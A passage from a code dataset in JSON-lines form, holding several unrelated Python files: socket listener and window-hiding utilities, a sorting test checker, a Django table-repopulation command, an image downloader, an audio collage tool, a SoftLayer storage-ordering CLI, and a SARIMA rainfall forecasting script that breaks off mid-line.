(KeyboardInterrupt, SystemExit, EOFError):\n break\n return l\n\nclass Wipe(object):\n \"\"\"This class is intended to be used as a console command to clear screen\"\"\"\n def __repr__(self):\n os.system('cls' if os.name=='nt' else 'clear')\n return \"\"\n\nclass listenthread(threading.Thread):\n def __init__(self, IP, PORT, SOCK_TYPE):\n self.sock = socket.socket(socket.AF_INET, SOCK_TYPE)# Internet\n self.sock.bind((IP, PORT))\n self.sock_type = SOCK_TYPE\n if SOCK_TYPE == socket.SOCK_STREAM:\n 
self.sock.listen(1)\n super(listenthread, self).__init__()\n self._stop = threading.Event()\n\n def close(self):\n self.sock.close()\n\n def run(self):\n while not self._stop.isSet():\n try:\n if self.sock_type == socket.SOCK_STREAM:\n conn, addr = self.sock.accept()\n print('Connection address:', addr)\n recv_data = conn.recv(1024)\n else:\n recv_data, addr = self.sock.recvfrom(1024)\n if recv_data:\n print(recv_data, 'from', addr)\n except:\n self._stop.set()\n\ndef listen(IP, PORT, SOCK_TYPE=socket.SOCK_DGRAM):\n server_thread = listenthread(IP, PORT, SOCK_TYPE)\n server_thread.daemon = True\n server_thread.start()\n try:\n while True: sleep(0.1)\n except (KeyboardInterrupt, SystemExit):\n print('Closing socket...')\n server_thread.close()\n print('Closed...')\n\ndef udp_listen(UDP_IP, UDP_PORT):\n listen(UDP_IP, UDP_PORT)\n\ndef tcp_listen(UDP_IP, UDP_PORT):\n listen(UDP_IP, UDP_PORT, socket.SOCK_STREAM)\n\nclear = Wipe()\n\nif os.name=='nt':\n import ctypes\n FindWindow = ctypes.windll.user32.FindWindowW\n ShowWindow = ctypes.windll.user32.ShowWindow\n\n window_ignore = ['', 'Default IME', 'MSCTFIME UI', 'GDI+ Window', 'CWNPTransportImpl', 'DDE Server Window',\n 'Task Host Window', 'Windows Push Notifications Platform', 'Windows Shell Experience Host',\n 'Battery Meter', 'BluetoothNotificationAreaIconWindowClass']\n EnumWindows = ctypes.windll.user32.EnumWindows\n EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))\n GetWindowText = ctypes.windll.user32.GetWindowTextW\n GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW\n IsWindowVisible = ctypes.windll.user32.IsWindowVisible\n\n def foreach_window(hwnd, lParam):\n length = GetWindowTextLength(hwnd)\n buff = ctypes.create_unicode_buffer(length + 1)\n GetWindowText(hwnd, buff, length + 1)\n title = buff.value\n if title not in window_ignore:\n windows[title] = bool(IsWindowVisible(hwnd))\n return True\n windows = {}\n\n\n def hide(s):\n \"\"\" Hide a window\n :param s: Target window title\n :return: None\n :OS: WINDOWS\"\"\"\n EnumWindows(EnumWindowsProc(foreach_window), 0)\n s = max(similar(title, s) for title in windows)[1]\n ShowWindow(FindWindow(None, s), 0)\n def show(s):\n \"\"\" Show a window\n :param s: Target window title\n :return: None\n :OS: WINDOWS\"\"\"\n EnumWindows(EnumWindowsProc(foreach_window), 0)\n s = max(similar(title, s) for title in windows)[1]\n ShowWindow(FindWindow(None, s), 5)\n","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25747688","text":"from McUtils.GaussianImport import GaussianLogReader\nimport os\n\n\ndef pull_cord(log_file):\n with GaussianLogReader(log_file) as reader:\n parse = reader.parse(\"ZMatCartesianCoordinates\")\n i, coords = parse[\"ZMatCartesianCoordinates\"]\n return i, coords\n\n\n# def write_file(coords, settings, c_m):\n# with open('%s' %settings, 'r') as set:\n# with open('%s')\nmain_dir = os.path.dirname(os.path.dirname(__file__))\nlog_dir = os.path.join(main_dir, '2D Scans', 'logs')\ni, coords = pull_cord(os.path.join(log_dir, '2D_tet_inout.log'))\nprint(coords)\n\ncharge = '0'\nmulti = '1'\nc_m = charge + ' ' + multi\n\n\n","sub_path":"writegjf.py","file_name":"writegjf.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535527741","text":"#!/usr/bin/env 
python3\n\nfrom sys import argv\nfrom random import randint\nimport os\n\nN = 10\nINT_LIMIT = 1000\nMAX_LENGTH = 1000\n\n\ndef main():\n test_map = {\n '0': run_general_test,\n '1': run_quicksort_test,\n '2': run_heapsort_test\n }\n test_num = argv[1]\n for i in range(1, N+1):\n test_func = test_map.get(test_num, lambda: None)\n test_func()\n print(f'test {test_num} pass {i} OK')\n\n\ndef run_general_test():\n test_array = [\n randint(-INT_LIMIT, INT_LIMIT)\n for _ in range(randint(1, MAX_LENGTH))]\n test_input = '{n}\\\\n{array}'.format(\n n=len(test_array),\n array=' '.join(str(x) for x in test_array))\n cmd = 'echo -e \"{test_input}\" | ./a.out'.format(test_input=test_input)\n user_out = os.popen(cmd).read().strip()\n user_array = [int(x) for x in user_out.split()]\n expected_array = sorted(test_array)\n\n assert user_array == expected_array, 'expected {}, got {}'.format(\n expected_array, user_array)\n\n\ndef run_quicksort_test():\n\n def partition(arr, low, high):\n i = low - 1\n pivot = arr[(high-low)//2]\n for j in range(low, high):\n if arr[j] <= pivot:\n i += 1\n arr[i], arr[j] = arr[j], arr[i]\n arr[i + 1], arr[high] = arr[high], arr[i + 1]\n return i + 1\n\n def quicksort(arr, low, high):\n expected_iterations.append(test_array.copy())\n if low < high:\n pi = partition(arr, low, high)\n quicksort(arr, low, pi-1)\n quicksort(arr, pi + 1, high)\n\n\n test_array = [\n randint(-INT_LIMIT, INT_LIMIT)\n for _ in range(randint(1, MAX_LENGTH))] \n test_input = '{n}\\\\n{array}'.format(\n n=len(test_array),\n array=' '.join(str(x) for x in test_array))\n cmd = 'echo -e \"{test_input}\" | ./a.out'.format(test_input=test_input)\n os.popen(cmd).read()\n \n expected_iterations = list()\n quicksort(test_array, 0, len(test_array)-1)\n\n with open('quicksort.log') as f:\n user_iterations = [[int(x) for x in line.split()] for line in f.readlines()]\n\n assert user_iterations == expected_iterations, 'quicksort mismatch'\n\n\ndef run_heapsort_test():\n\n def heapify(arr, n, i):\n largest = i\n l = 2 * i + 1\n r = 2 * i + 2\n if l < n and arr[i] < arr[l]:\n largest = l\n if r < n and arr[largest] < arr[r]:\n largest = r\n if largest != i:\n arr[i],arr[largest] = arr[largest],arr[i]\n expected_iterations.append(test_array.copy())\n heapify(arr, n, largest)\n\n def heapsort(arr):\n expected_iterations.append(test_array.copy())\n n = len(arr)\n for i in range(n, -1, -1):\n heapify(arr, n, i)\n for i in range(n-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n expected_iterations.append(test_array.copy())\n heapify(arr, i, 0)\n\n\n test_array = [\n randint(-INT_LIMIT, INT_LIMIT)\n for _ in range(randint(1, MAX_LENGTH))]\n \n test_input = '{n}\\\\n{array}'.format(\n n=len(test_array),\n array=' '.join(str(x) for x in test_array))\n\n cmd = 'echo -e \"{test_input}\" | ./a.out'.format(test_input=test_input)\n os.popen(cmd).read()\n\n expected_iterations = list()\n heapsort(test_array)\n\n with open('heapsort.log') as f:\n user_iterations = [[int(x) for x in line.split()] for line in f.readlines()]\n\n assert user_iterations == expected_iterations, 'heapsort mismatch'\n\n\nif __name__ == \"__main__\":\n main()\n \n","sub_path":"pr7/tests/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569888961","text":"# -*- coding: utf-8 -*-\n\"\"\"sequence\n\nMeant to run to repopulate missing values in table.\n\nOptions:\n sequence: Populate sequence table from sequencerun table\n 
libraryrun: Populate libraryrun table based from sequence, fastq, metadata, and workflow tables\n\n\nUsage:\n aws sso login --profile dev && export AWS_PROFILE=dev\n make up\n export DJANGO_SETTINGS_MODULE=data_portal.settings.local\n python manage.py migrate\n python manage.py help repopulatetable\n python manage.py repopulatetable sequence\n\"\"\"\nimport logging\n\nfrom django.core.management import BaseCommand, CommandParser\nfrom django.db import connection\n\nfrom data_portal.models.sequence import SequenceStatus\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\"\"\"\nThe Following is SQL statement for populating sequence.\n\"\"\"\nTRUNCATE_SEQUENCE_TABLE_SQL = \"\"\"\nTRUNCATE TABLE data_portal_sequence;\n\"\"\"\n\nQUERY_LATEST_INTRUMENT_RUN_ID_DATA_SQL = \"\"\"\nSELECT date_modified,\n flowcell_barcode,\n gds_folder_path,\n gds_volume_name,\n sequencerun.instrument_run_id,\n reagent_barcode,\n run_id,\n sample_sheet_name,\n status\nFROM data_portal.data_portal_sequencerun sequencerun\n INNER JOIN (SELECT instrument_run_id,\n Max(date_modified) AS maxdate\n FROM data_portal.data_portal_sequencerun\n GROUP BY instrument_run_id) last_sequencerun\n ON sequencerun.instrument_run_id =\n last_sequencerun.instrument_run_id\n AND sequencerun.date_modified = last_sequencerun.maxdate \n\"\"\"\n\nQUERY_INITIAL_INTRUMENT_RUN_ID_DATE_SQL = \"\"\"\nSELECT Min(date_modified) AS mindate\nFROM data_portal.data_portal_sequencerun\nWHERE instrument_run_id = %s\nGROUP BY instrument_run_id \n\"\"\"\n\nINSERT_SEQUENCE_TABLE_SQL = \"\"\"\nINSERT INTO data_portal_sequence\n (\n instrument_run_id,\n run_id,\n sample_sheet_name,\n gds_folder_path,\n gds_volume_name,\n reagent_barcode,\n flowcell_barcode,\n status ,\n start_time ,\n end_time\n )\nVALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\n\"\"\"\n\n\"\"\"\nThe following are SQL statement for libraryRun\n\"\"\"\nTRUNCATE_LIBRARYRUN_TABLE_SQL = \"\"\"\nTRUNCATE TABLE data_portal_libraryrun;\n\"\"\"\n\nQUERY_SEQUENCE_TABLE_SQL = \"\"\"\nSELECT instrument_run_id,\n run_id\nFROM data_portal.data_portal_sequence \n\"\"\"\n\nQUERY_RGLB_LANE_FROM_FASTQLIST_SQL = \"\"\"\nSELECT rglb,\n lane\nFROM data_portal.data_portal_fastqlistrow fastq\n inner join data_portal.data_portal_sequencerun sequencerun\n ON fastq.sequence_run_id = sequencerun.id\nWHERE sequencerun.instrument_run_id = %s\n AND sequencerun.run_id = %s \n\"\"\"\n\nQUERY_OVERRIDE_CYCLES_SQL = \"\"\"\nSELECT override_cycles\nFROM data_portal.data_portal_labmetadata\nWHERE library_id = %s\n\"\"\"\n\nQUERY_WORKFLOW_FROM_LIBRARY_ID_SQL = \"\"\"\nSELECT id\nFROM data_portal.data_portal_workflow\nWHERE ( input LIKE %s\n OR output LIKE %s )\n\"\"\"\n\nINSERT_LIBRARYRUN_VALUE_SQL = \"\"\"\nINSERT INTO data_portal_libraryrun\n (\n library_id,\n instrument_run_id ,\n run_id,\n lane,\n override_cycles,\n coverage_yield,\n qc_pass ,\n qc_status ,\n valid_for_analysis\n )\nVALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\nRETURNING id;\n\"\"\"\n\nDROP_LIBRARYRUN_WORKFLOW_TABLE_SQL = \"\"\"\nDrop TABLE IF EXISTS data_portal_libraryrun_workflows\n\"\"\"\n\nCREATE_LIBRARYRUN_WORKFLOW_TABLE_SQL = \"\"\"\nCREATE TABLE data_portal_libraryrun_workflows\n (\n id BIGINT(20) NOT NULL auto_increment,\n libraryrun_id BIGINT(20) NOT NULL,\n workflow_id BIGINT(20) NOT NULL,\n PRIMARY KEY (id),\n UNIQUE KEY data_portal_libraryrun_w_libraryrun_id_workflow_i_d2b4b128_uniq\n (libraryrun_id, workflow_id),\n KEY data_portal_libraryr_workflow_id_7f31cc94_fk_data_port (workflow_id),\n CONSTRAINT 
data_portal_libraryr_libraryrun_id_3bcbad1b_fk_data_port FOREIGN\n KEY (libraryrun_id) REFERENCES data_portal_libraryrun (id),\n CONSTRAINT data_portal_libraryr_workflow_id_7f31cc94_fk_data_port FOREIGN\n KEY (workflow_id) REFERENCES data_portal_workflow (id)\n ) \n\"\"\"\n\nINSERT_LIBRARYRUN_WORKFLOW_TABLE_SQL = \"\"\"\nINSERT INTO data_portal_libraryrun_workflows\n (\n libraryrun_id,\n workflow_id\n )\nVALUES (%s, %s);\n\"\"\"\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser: CommandParser):\n parser.add_argument('table', help=\"defines which table to repopulate\")\n\n def handle(self, *args, **options):\n opt_table = options[\"table\"].lower()\n\n if opt_table == \"sequence\":\n logger.info(\"Sequence table selected\")\n\n with connection.cursor() as cursor:\n\n # Reset existing data\n logger.info(\"Truncate sequence table\")\n cursor.execute(TRUNCATE_SEQUENCE_TABLE_SQL)\n\n # Fetch latest data of instrument_run_id\n logger.info(\"Fetch latest data of instrument_run_id\")\n cursor.execute(QUERY_LATEST_INTRUMENT_RUN_ID_DATA_SQL)\n latest_data = cursor.fetchall()\n\n logger.info(\"Iterate over the latest data\")\n for row in latest_data:\n # Destructure variables for each row\n end_time, flowcell_barcode, gds_folder_path, \\\n gds_volume_name, instrument_run_id, reagent_barcode, \\\n run_id, sample_sheet_name, status = row\n\n # Fetch start_time of sequence\n cursor.execute(QUERY_INITIAL_INTRUMENT_RUN_ID_DATE_SQL,\n [instrument_run_id])\n start_time = cursor.fetchone()[0]\n\n # Check if sequence has ended and end_time is eligible to be recorded\n status = SequenceStatus.from_seq_run_status(status)\n if status not in [SequenceStatus.SUCCEEDED, SequenceStatus.FAILED]:\n logger.info(f\"Sequence {instrument_run_id} not finished, setting end_time to None\")\n end_time = None\n\n logger.info(f\"Insert sequence {instrument_run_id} to sequence table from data fetched\")\n cursor.execute(INSERT_SEQUENCE_TABLE_SQL, [instrument_run_id,\n run_id, sample_sheet_name, gds_folder_path,\n gds_volume_name, reagent_barcode, flowcell_barcode,\n status, start_time, end_time])\n\n logger.info(\"Repopulate sequence table complete\")\n\n elif opt_table == \"libraryrun\":\n logger.info(\"LibraryRun table selected\")\n\n # Default value\n coverage_yield = None\n qc_pass = False\n qc_status = None\n valid_for_analysis = True\n\n with connection.cursor() as cursor:\n\n # Associated constraint must be dropped before resetting libraryrun\n logger.info(\"Drop data_portal_libraryrun_workflows table\")\n cursor.execute(DROP_LIBRARYRUN_WORKFLOW_TABLE_SQL)\n\n # Reset libraryrun \n logger.info(\"Truncate data_portal_libraryrun table\")\n cursor.execute(TRUNCATE_LIBRARYRUN_TABLE_SQL)\n\n # Establish new libraryrun constraint\n logger.info(\"Create a brand new libraryrun_workflow table\")\n cursor.execute(CREATE_LIBRARYRUN_WORKFLOW_TABLE_SQL)\n\n # Fetch list of instrument_run_id and run_id from sequence\n logger.info(\"Fetch sequence run\")\n cursor.execute(QUERY_SEQUENCE_TABLE_SQL)\n sequence_list = cursor.fetchall()\n\n for instrument_run_id, run_id in sequence_list:\n # Grab RGLB and lane from fastqlist\n cursor.execute(QUERY_RGLB_LANE_FROM_FASTQLIST_SQL, [instrument_run_id, run_id])\n fastq_list = cursor.fetchall()\n\n for library_id, lane in fastq_list:\n\n # Find override_cycles from metadata\n cursor.execute(QUERY_OVERRIDE_CYCLES_SQL, [library_id])\n override_cycles = cursor.fetchone()[0]\n\n # Insert libraryrun entries to the table\n logger.info(f\"Inserting {instrument_run_id}, {run_id}, {library_id}, {lane} entries to \"\n f\"data_portal_libraryrun table.\")\n cursor.execute(INSERT_LIBRARYRUN_VALUE_SQL, [library_id, instrument_run_id, run_id, lane,\n override_cycles, coverage_yield, qc_pass, qc_status,\n valid_for_analysis])\n inserted_libraryrun_id = cursor.fetchone()[0]\n\n # Extract associated workflow with libraryid\n cursor.execute(QUERY_WORKFLOW_FROM_LIBRARY_ID_SQL, [f\"%{library_id}%\", f\"%{library_id}%\"])\n workflow_id_list = cursor.fetchall()\n\n # Insert associated workflow to data_portal_libraryrun_workflow\n for workflow_id in workflow_id_list:\n cursor.execute(INSERT_LIBRARYRUN_WORKFLOW_TABLE_SQL, [inserted_libraryrun_id, workflow_id])\n\n logger.info(\"LibraryRun successfully repopulated.\")\n","sub_path":"data_portal/management/commands/repopulatetable.py","file_name":"repopulatetable.py","file_ext":"py","file_size_in_byte":9515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"578556169","text":"\r\n# Asynchronous download of data from a WWW page\r\nimport requests\r\nfrom multiprocessing.pool import ThreadPool\r\n\r\nBASE_URL = \"http://51.91.120.89/TABLICE/\"\r\n\r\nresponse = requests.get(BASE_URL)\r\nlines = response.text.split(\"\\n\")\r\nurls = [f\"{BASE_URL}{l.strip()}\" for l in lines if len(l.strip())>0 ]\r\nprint(urls)\r\n\r\ndef download_url(url):\r\n #print(f\"Start {url}\")\r\n r = requests.get(url)\r\n file_name = url.split(\"/\")[-1]\r\n with open(file_name, \"wb\") as fd:\r\n fd.write(r.content)\r\n #print(f\"Stop {url}\")\r\n return file_name\r\n\r\n#download_url(\"http://51.91.120.89/TABLICE/NO9738R.jpg\")\r\nresult = ThreadPool(20).imap_unordered( download_url, urls )\r\nfor r in result:\r\n print(r)\r\n\r\n\r\n","sub_path":"Dzien02/09-multiprocessing.py","file_name":"09-multiprocessing.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"472701268","text":"SPACE = ' '\nLINE_BREAK = '\\n'\n\nfile = open('A-large-practice.in')\nlines = list(file)\n\nCASE_COUNT = int(lines.pop(0))\nCASE_LINE_COUNT = 3\nCASE_LINE_TOTAL_COUNT = CASE_COUNT * CASE_LINE_COUNT\n\nfor i, line in enumerate(lines):\n\tlines[i] = line.strip(LINE_BREAK)\n\t\t\noutput_file = open('A-large-practice.out', 'w')\n\ncount = 0\ni = 0\n\nwhile count < CASE_LINE_TOTAL_COUNT:\n    output = 'Case #' + str(i + 1) + ': '\n    case_set = range(count, count + CASE_LINE_COUNT)\n    c = lines[case_set[0]]\n    p = lines[case_set[2]]\n    l = list(p.split(SPACE))\n    d = {}\n    for k, v in enumerate(l):\n        d[v] = k\n    dd = {}\n    for k, v in enumerate(reversed(l)):\n        dd[v] = len(l) - k - 1\n\n    e = enumerate(l)\n\n    for k, v in e:\n        m = str(int(c) - 
int(v))\n#\t\ttry:\n#\t\t\tline_break = LINE_BREAK\n#\t\t\toutput += str(k + 1) + SPACE + str(int(d[m]) + 1)\n\t\t\t\n#\t\t\tif (i + 1) == CASE_COUNT:\n#\t\t\t\tline_break = ''\n\n#\t\t\toutput_file.write(output + line_break)\n\t\t\t\n#\t\t\tbreak\n#\t\texcept:\n#\t\t\tpass\n\t\t\t\n#\tcount = count + CASE_LINE_COUNT\n#\ti += 1\n\t\n#while count < CASE_LINE_TOTAL_COUNT:\n#\toutput = 'Case #' + str(i + 1) + ': '\n#\tcase_set = range(count, count + CASE_LINE_COUNT)\n\t\n#\tc = lines[case_set[0]]\n#\tp = lines[case_set[2]].split(SPACE)\n#\tb = False\n\t\n#\tfor k, v in enumerate(p):\n#\t\tfor kk, vv in enumerate(p):\n#\t\t\tif not int(k) == int(kk) and (int(v) + int(vv) == int(c)):\n#\t\t\t\tline_break = LINE_BREAK\n#\t\t\t\toutput += str(k + 1) + SPACE + str(kk + 1)\n#\t\t\t\t\n#\t\t\t\tif (i + 1) == CASE_COUNT:\n#\t\t\t\t\tline_break = ''\n\n#\t\t\t\toutput_file.write(output + line_break)\n\t\t\t\t\n#\t\t\t\tb = True\n#\t\t\t\tbreak\n#\t\tif b:\n#\t\t\tbreak\n\t\t\t\n#\tcount = count + CASE_LINE_COUNT\n#\ti += 1","sub_path":"practice/a/store_credit.py","file_name":"store_credit.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223621241","text":"#!/usr/bin/python\n\nimport sys\nimport argparse\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\n\nimport wave\nimport librosa\nfrom dtw import dtw\nfrom numpy.linalg import norm\n\ndef list_files(directory):\n onlyfiles = [f for f in listdir(directory) if isfile(join(directory, f)) and re.match(r'.*\\.wav$',f)]\n return map(lambda f: join(directory, f), onlyfiles)\n\ndef extract_features(path):\n y, sr = librosa.load(path)\n mfcc = librosa.feature.mfcc(y,sr) #Computing MFCC values\n return [path, mfcc]\n\nparser=argparse.ArgumentParser(description='Create a collage based on a given file using given snippets.')\nparser.add_argument(\n '-s', '--sampledir', type=str, required=True, help='Path of chopped source sounds directory.')\nparser.add_argument(\n '-c', '--chopdir', type=str, required=True, help='Path of snippets directory.')\nparser.add_argument(\n '-o', '--outfile', type=str, required=False, default='./collage.wav', help='Path of output file.')\n\nargs = parser.parse_args()\n\nsample_dir = args.sampledir\nchop_dir = args.chopdir\noutfile = args.outfile\n\ntmp_dir = './tmp'\n\nsample_files = list_files(sample_dir)\nsnippet_files = list(list_files(chop_dir))\nsnippet_files.sort()\n\nsample_files = [extract_features(path) for path in sample_files]\n\nselected_snippets = []\n\nfor snippet_path in snippet_files:\n y1, sr1 = librosa.load(snippet_path)\n mfcc = librosa.feature.mfcc(y1,sr1) #Computing MFCC values\n\n min_dist = 999999999\n closest_sample = None\n for sample_path, sample_mfcc in sample_files:\n dist, cost, acc_cost, path = dtw(mfcc.T, sample_mfcc.T, dist=lambda x, y: norm(x - y, ord=1))\n if dist < min_dist:\n min_dist = dist\n closest_sample = sample_path\n\n selected_snippets.append(closest_sample)\n\nwith wave.open(outfile, 'wb') as wav_out:\n for wav_path in selected_snippets:\n with wave.open(wav_path, 'rb') as wav_in:\n if not wav_out.getnframes():\n wav_out.setparams(wav_in.getparams())\n wav_out.writeframes(wav_in.readframes(wav_in.getnframes()))\n","sub_path":"collage.py","file_name":"collage.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258789153","text":"\"\"\"Order a file storage volume.\"\"\"\n# 
:license: MIT, see LICENSE for more details.\n\nimport click\nimport SoftLayer\nfrom SoftLayer.CLI import environment\nfrom SoftLayer.CLI import exceptions\n\n\nCONTEXT_SETTINGS = {'token_normalize_func': lambda x: x.upper()}\n\n\n@click.command(context_settings=CONTEXT_SETTINGS)\n@click.option('--storage-type',\n              help='Type of file storage volume',\n              type=click.Choice(['performance', 'endurance']),\n              required=True)\n@click.option('--size',\n              type=int,\n              help='Size of file storage volume in GB',\n              required=True)\n@click.option('--iops',\n              type=int,\n              help='Performance Storage IOPs,'\n              ' between 100 and 6000 in multiples of 100'\n              ' [required for storage-type performance]')\n@click.option('--tier',\n              help='Endurance Storage Tier (IOP per GB)'\n              ' [required for storage-type endurance]',\n              type=click.Choice(['0.25', '2', '4', '10']))\n@click.option('--location',\n              help='Datacenter short name (e.g.: dal09)',\n              required=True)\n@click.option('--snapshot-size',\n              type=int,\n              help='Optional parameter for ordering snapshot '\n              'space along with endurance file storage; specifies '\n              'the size (in GB) of snapshot space to order')\n@click.option('--service-offering',\n              help='The service offering package to use for placing '\n              'the order [optional, default is \\'storage_as_a_service\\']',\n              default='storage_as_a_service',\n              type=click.Choice([\n                  'storage_as_a_service',\n                  'enterprise',\n                  'performance']))\n@click.option('--billing',\n              type=click.Choice(['hourly', 'monthly']),\n              default='monthly',\n              help=\"Optional parameter for Billing rate (default to monthly)\")\n@environment.pass_env\ndef cli(env, storage_type, size, iops, tier,\n        location, snapshot_size, service_offering, billing):\n    \"\"\"Order a file storage volume.\"\"\"\n    file_manager = SoftLayer.FileStorageManager(env.client)\n    storage_type = storage_type.lower()\n\n    hourly_billing_flag = False\n    if billing.lower() == \"hourly\":\n        hourly_billing_flag = True\n\n    if hourly_billing_flag and service_offering != 'storage_as_a_service':\n        raise exceptions.CLIAbort(\n            'Hourly billing is only available for the storage_as_a_service '\n            'service offering'\n        )\n\n    if storage_type == 'performance':\n        if iops is None:\n            raise exceptions.CLIAbort(\n                'Option --iops required with Performance')\n\n        if iops % 100 != 0:\n            raise exceptions.CLIAbort(\n                'Option --iops must be a multiple of 100'\n            )\n\n        if service_offering == 'performance' and snapshot_size is not None:\n            raise exceptions.CLIAbort(\n                '--snapshot-size is not available for performance volumes '\n                'ordered with the \\'performance\\' service offering option'\n            )\n\n        # This order call must stay inside the performance branch; at top\n        # level it would also run for endurance volumes (with iops=None and\n        # no tier) and place a spurious second order.\n        try:\n            order = file_manager.order_file_volume(\n                storage_type=storage_type,\n                location=location,\n                size=size,\n                iops=iops,\n                snapshot_size=snapshot_size,\n                service_offering=service_offering,\n                hourly_billing_flag=hourly_billing_flag\n            )\n        except ValueError as ex:\n            raise exceptions.ArgumentError(str(ex))\n\n    if storage_type == 'endurance':\n        if tier is None:\n            raise exceptions.CLIAbort(\n                'Option --tier required with Endurance in IOPS/GB '\n                '[0.25,2,4,10]'\n            )\n\n        try:\n            order = file_manager.order_file_volume(\n                storage_type=storage_type,\n                location=location,\n                size=size,\n                tier_level=float(tier),\n                snapshot_size=snapshot_size,\n                service_offering=service_offering,\n                hourly_billing_flag=hourly_billing_flag\n            )\n        except ValueError as ex:\n            raise exceptions.ArgumentError(str(ex))\n\n    if 'placedOrder' in order.keys():\n        click.echo(\"Order #{0} placed successfully!\".format(\n            order['placedOrder']['id']))\n        for item in 
order['placedOrder']['items']:\n            click.echo(\" > %s\" % item['description'])\n    else:\n        click.echo(\"Order could not be placed! Please verify your options \" +\n                   \"and try again.\")\n","sub_path":"SoftLayer/CLI/file/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163594539","text":"# scipy\nimport scipy\nprint('scipy: %s' % scipy.__version__)\n\n# numpy\nimport numpy as np\nprint('numpy: %s' % np.__version__)\n\n# pandas\nimport pandas as pd\nprint('pandas: %s' % pd.__version__)\n\n# scikit-learn\nimport sklearn\nprint('sklearn: %s' % sklearn.__version__)\n\n# statsmodels\nimport statsmodels\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport statsmodels.tsa.api as smt\nprint('statsmodels: %s' % statsmodels.__version__)\n\n# json\nfrom bson import json_util, ObjectId\nfrom bson.json_util import dumps\nfrom pandas.io.json import json_normalize\nimport json\n\nimport itertools\nimport warnings\nimport datetime\n\nfrom flask import jsonify\n\n# Import the database handles\nfrom app import db, db2\n\ndef PredictSARIMARainfall(stationId):\n\n    # Get station Infos\n    station_info = list(db.meteo_data_weather_stations.find({'_id':ObjectId(stationId)}))\n\n    print('\\n')\n    print('*************************************************************')\n    print('**************** AgroAnalytics BRAINS API *******************')\n    print('*************************************************************')\n    print('\\n')\n    print('------------------------ SARIMA -----------------------------')\n    print('\\n')\n    print('Preparando dados da cidade de '+ station_info[0]['unparsed_city'] +'....')\n    print('\\n')\n\n    # Fetch the dataset from the database\n    weather = list(db.meteo_data_weather_data.find({'weather_station_id': ObjectId(stationId)}))\n    weather_normalized = pd.io.json.json_normalize(weather)\n    df_rainfall = pd.DataFrame(weather_normalized[['analysis_date', 'rainfall.rainfall']])\n    df_rainfall = df_rainfall.set_index('analysis_date')\n    ts_rainfall = df_rainfall['2000-03-01':'2017-08-11'].groupby(pd.TimeGrouper(freq='MS')).mean()\n\n    # Create training and test samples before running the analysis\n    n_sample = ts_rainfall.shape[0]\n    n_forecast=12\n    n_train=n_sample-n_forecast\n    ts_train = ts_rainfall.iloc[:n_train]['rainfall.rainfall']\n    ts_test = ts_rainfall.iloc[n_train:]['rainfall.rainfall']\n    print(ts_train.shape)\n    print(ts_test.shape)\n    print(\"Training Series:\", \"\\n\", ts_train.tail(), \"\\n\")\n    print(\"Testing Series:\", \"\\n\", ts_test.head())\n\n    print('----------------- Iniciando Treinamento ---------------------')\n    print('\\n')\n    # Train and define the model\n    p=0\n    d=0\n    q=4\n    P=3\n    D=0\n    Q=4\n    s=12\n    arima202 = sm.tsa.SARIMAX(ts_train, order=(p,d,q), seasonal_order=(P,D,Q,s), enforce_stationarity=False, enforce_invertibility=False)\n    model_results = arima202.fit()\n\n    # Make predictions\n    pred_begin = ts_train.index[model_results.loglikelihood_burn]\n    pred_end = ts_test.index[-1] + datetime.timedelta(days=365)\n    pred = model_results.get_prediction(start=pred_begin.strftime('2013-01-%d'),\n                                        end=pred_end.strftime('%Y-%m-%d'))\n    pred_mean = pred.predicted_mean\n    pred_ci = pred.conf_int(alpha=0.05)\n\n    # Prepare lists with the data\n    \n    pred = pred_mean.values\n    pred_list = pred.tolist()\n\n    data = ts_rainfall['rainfall.rainfall'].values\n    data_list = data.tolist()\n\n    index = pred_mean.index\n    index_list = index.tolist()\n\n    # Copy the list: the masking below must not also mutate data_list\n    data_train = list(data_list)\n    
data_test = [None] * len(data_list)\n\n    for i in range(1,13):\n        data_test[-i]=data_list[-i]\n        data_train[-i]=None\n\n    data_train[-12]=data_test[-12]\n\n    for i in range(12):\n        data_train.append(None)\n        data_test.append(None)\n\n    # Prepare the model metrics\n\n    def get_rmse(y, y_hat):\n        mse = np.mean((y - y_hat)**2)\n        return np.sqrt(mse)\n\n\n    # Prepare the dictionary to be persisted\n    dict_data = {}\n    dict_data['data']=data_list\n    dict_data['data_test']=data_test\n    dict_data['data_train']=data_train\n    dict_data['data_pred']=pred_list\n    dict_data['index']=index_list\n    dict_data['city']=station_info[0]['unparsed_city']\n    dict_data['model']='SARIMA'\n    dict_data['type']='Precipitação'\n    tempoFinalização=datetime.datetime.now()\n    dict_data['date']=tempoFinalização\n    dict_data['pdq']= str(p)+', '+str(d)+', '+str(q)\n    dict_data['PDQs']= str(P)+', '+str(D)+', '+str(Q)+', '+str(s)\n    # .loc replaces the long-deprecated .ix indexer\n    dict_data['rmse_train']=get_rmse(ts_train, 